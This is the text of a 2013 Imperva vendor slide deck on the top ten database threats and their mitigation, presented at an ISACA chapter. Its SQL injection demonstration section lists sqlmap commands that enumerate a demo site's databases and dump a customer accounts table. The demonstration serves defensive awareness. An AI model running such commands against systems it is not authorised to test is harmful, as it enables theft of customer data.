![Page 1: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/1.jpg)
© 2013 Imperva, Inc. All rights reserved.
Top 10 Database Threats
ISACA Charlotte Chapter
Confidential 1
Presented by Eric Gerena
![Page 2: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/2.jpg)
© 2013 Imperva, Inc. All rights reserved.
Agenda
Background
Top 10 Database Threats
Neutralizing the Threats
SQLi Attack Demonstration
Q&A
© Copyright 2012 Imperva, Inc. All rights reserved. 2
![Page 3: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/3.jpg)
© 2013 Imperva, Inc. All rights reserved.
Background
![Page 4: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/4.jpg)
© 2013 Imperva, Inc. All rights reserved.
What’s Changed?
![Page 5: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/5.jpg)
© 2013 Imperva, Inc. All rights reserved.
Top 10 Database Threats
Confidential 5
Are you at risk?
![Page 6: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/6.jpg)
© 2013 Imperva, Inc. All rights reserved.
1. Excessive & Unused Privileges
![Page 7: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/7.jpg)
© 2013 Imperva, Inc. All rights reserved.
2. Privilege Abuse
![Page 8: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/8.jpg)
© 2013 Imperva, Inc. All rights reserved.
3. SQLi (SQL Injection)
![Page 9: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/9.jpg)
© 2013 Imperva, Inc. All rights reserved.
4. Malware
![Page 10: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/10.jpg)
© 2013 Imperva, Inc. All rights reserved.
5. Weak Audit Trail
![Page 11: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/11.jpg)
© 2013 Imperva, Inc. All rights reserved.
6. Storage Media Exposure
![Page 12: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/12.jpg)
© 2013 Imperva, Inc. All rights reserved.
7. Database Vulnerability Exploitation
![Page 13: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/13.jpg)
© 2013 Imperva, Inc. All rights reserved.
8. Unmanaged Sensitive Data
![Page 14: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/14.jpg)
© 2013 Imperva, Inc. All rights reserved.
9. Denial of Service (DoS)
![Page 15: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/15.jpg)
© 2013 Imperva, Inc. All rights reserved.
10. Limited Security Expertise & Education
![Page 16: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/16.jpg)
© 2013 Imperva, Inc. All rights reserved.
Neutralizing the Threats
Confidential 16
Risk Mitigation
![Page 17: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/17.jpg)
© 2013 Imperva, Inc. All rights reserved.
How to Neutralize the Threats
CONFIDENTIAL
Discover, Classify & Assess
User Rights Management
Auditing, Monitoring & Protecting
Data Protection
Non-Technical Security
![Page 18: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/18.jpg)
© 2013 Imperva, Inc. All rights reserved.
Discover, Classify & Assess
Rogue
SSN
Credit Cards
PII
Discover Active DBs
Discover Rogue DBs
Classify DBs
Vulnerability Assessments
Risk
![Page 19: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/19.jpg)
© 2013 Imperva, Inc. All rights reserved.
User Rights Management
Reduce Unwarranted Data Access
Map Rights to Individuals
Identify Dormant Accounts
Enforce “Need-to-Know”
Comply
![Page 20: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/20.jpg)
© 2013 Imperva, Inc. All rights reserved.
Auditing, Monitoring & Protecting
UPDATE orders set client ‘first Unusual Activity
X Allow
Block
Network User, DBAs, Sys Admin
X
Real Time Alerting & Blocking
Detect Unusual DB Activity
Monitor Local DB Activity
Impose Connection Controls
![Page 21: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/21.jpg)
© 2013 Imperva, Inc. All rights reserved.
Data Protection
Tamper-Proof Audit Trail
Storage Encryption
![Page 22: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/22.jpg)
© 2013 Imperva, Inc. All rights reserved.
Non-Technical Security
User Education & Awareness
Cultivate Experienced Security Professionals
![Page 23: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/23.jpg)
© 2013 Imperva, Inc. All rights reserved.
Risk Reduction
CONFIDENTIAL 23
0
5
10
15
20
25
30
35
Q1-2103 Q2-2013 Q3-2013 Q4-2013
AwarenessAuditVulnerabilities
![Page 24: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/24.jpg)
© 2013 Imperva, Inc. All rights reserved.
SQLi Attack Demonstration
Confidential 24
It still works!
![Page 25: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/25.jpg)
© 2013 Imperva, Inc. All rights reserved.
Anatomy of the Attack
Identify the Vulnerability
Exploit the Vulnerability
Compromi$e the Victim
![Page 26: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/26.jpg)
© 2013 Imperva, Inc. All rights reserved.
So, what tools will be used?
Identify the Vulnerability
Exploit the Vulnerability
Compromi$e the Victim
Commercial Web App Vulnerability Scanner
DB Exploit Tool "SQLMap"
![Page 27: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/27.jpg)
© 2013 Imperva, Inc. All rights reserved.
SQLMap Attack Commands
Identify All Databases and Current Database ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything --dbs
./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything --current-db
Identify Table(s) of Interest and Associated Columns ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db
--tables ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db
-T Legacy_Customer_Accounts --columns
Dump Records from Identified Table and Columns ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db
-T Legacy_Customer_Accounts --columns --dump >> /root/Desktop/SQLi-Attack-Results.txt
![Page 28: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/28.jpg)
© 2013 Imperva, Inc. All rights reserved.
Off to the Black Market!
![Page 29: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/29.jpg)
© 2013 Imperva, Inc. All rights reserved.
Imperva
Confidential 29
Data Security Solutions
![Page 30: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/30.jpg)
© 2013 Imperva, Inc. All rights reserved.
Imperva Highlights
About Imperva • Founded: 2002 • CEO: Shlomo Kramer, Co-Founder of Check Point • HQ in Redwood Shores, CA • 1,800+ customers; 25,000+ organizations • Customers in 50+ countries
The Problems We Solve The Problems We Solve Protecting the Data that Drives Business Maintaining Regulatory Compliance
30
Company Highlights • 480+ Employees • $104M in Revenue • $48M Deferred Revenue • Cash & CE: $ 102M • Publicly Traded: IMPV
2010 2011 2012 2013
33% YoY Growth
![Page 31: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/31.jpg)
© 2013 Imperva, Inc. All rights reserved.
The Solution
Confidential 31
Solving the business security problem requires a new protection layer positioned closely around the data and applications in the data center
External Customers
Staff, Partners Hackers
Internal Employees
Malicious Insiders Compromised Insiders
Data Center Systems and Admins
Tech. Attack Protection
Logic Attack Protection
Fraud Prevention
Usage Audit
User Rights Management
Access Control
IMPERVA’S MISSION IS TO PROVIDE A COMPLETE SOLUTION
![Page 32: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/32.jpg)
© 2013 Imperva, Inc. All rights reserved.
Databases - Coverage
Coverage for Heterogeneous Databases
DB2 DB2 z/OS DB2400 Informix Netezza
![Page 33: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/33.jpg)
© 2013 Imperva, Inc. All rights reserved.
Web Scanner Integration
33
![Page 34: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/34.jpg)
© 2013 Imperva, Inc. All rights reserved.
Thank You
Confidential 34
Imperva Data Security Solutions